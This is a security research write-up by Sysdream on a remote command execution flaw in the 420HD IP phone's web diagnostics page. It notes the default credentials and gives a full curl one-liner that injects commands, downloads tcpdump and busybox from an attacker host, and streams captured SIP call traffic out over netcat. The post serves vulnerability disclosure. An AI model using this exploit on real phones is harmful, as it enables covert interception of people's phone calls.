Introduction

In March 2018, Sysdream have discovered several vulnerabilities in the 420HD IP phone (firmware version: 2.2.12.126). The related vulnerabilities are all published and associated to a CVE identifier :

In this article, we will focus on the RCE vulnerability.

A Remote Command Execution is always interesting to catch during a penetration test, as it usually provides a nice system shell against the vulnerable asset, with potentially high privileges.

Finding this vulnerability on a IP phone may seem a little bit useless at first. Indeed, these devices usually do not store interesting data.

Nevertheless, they do process and transmit really interesting data: phone calls.

The idea behind our exploitation attempts was to illustrate the risk, by exploiting the phone without touching the network for better stealthiness (like with an ARP cache poisoning attack).

RCE discovery and exploitation

Vulnerability discovery

The prerequisite to identify and exploit this flaw is to have valid credentials against the Web management page.

As lots of network devices, this one has default credentials, which are often unchanged in practice.

We could use the following credentials (it can be found in the manual), admin:1234:

Once authenticated on the Web platform, we have access to monitoring and diagnostics features:

The Web page allows to view the result of ps, top and cat /proc/meminfo.

Tampering with the parameter inside the command.cgi page, we are able to execute arbitrary system commands:

Having fun with phone calls spying

The good news is that we have root permission in the system:

The bad news is that we are in a restricted shell, BusyBox:

As a brief reminder, BusyBox consists in a binary that contains main Unix commands. It is often found in embedded equipment.

Depending on the used version, we have more or less commands to interact with the operating system. Unfortunately, this one is quite poor. We don't get netcat, python orperl, and we have some restricted versions of known binaries like wget.

Nevertheless, executing the command cat /proc/cpuinfo, we discover the architecture used by the phone:

Thus, the phone is based on the MIPS architecture.

It is possible to use Metasploit in order to upload an interactive shell for this architecture, but that does not offer any extra feature.

So, we decided to look for other MIPS (Little Endian) binaries on the Internet. We found two particular ones :

Now, we can use Tcpdump to intercept the SIP traffic and netcat to forward it to the attacker's machine.

The one-liner exploit looks like this:

curl -v --user 'admin:1234' 'http://10.89.7.48/command.cgi?ps|wget http://10.89.6.190:8000/tcpdump -P /tmp%26%26wget http://10.89.6.190:8000/busybox-mipsel -P /tmp%26%26chmod %2Bx /tmp/tcpdump%26%26chmod %2Bx /tmp/busybox-mipsel%26%26/tmp/tcpdump -n -i any udp -w -|/tmp/busybox-mipsel nc 10.89.6.190 10000'

We can use Wireshark to see the call in progress:

Then, always with Wireshark, we can replay the phone call:

To watch it in live with more details and fun, please check our PoC video:

Author

Anthony BAUBE <a.baube -at- sysdream.com>

Acknowledgements

Thank you to Antoine Morin <a.morin -at- sysdream.com> for his assistance and thank you to the other Sysdream consultants for your helpful ideas and support. :)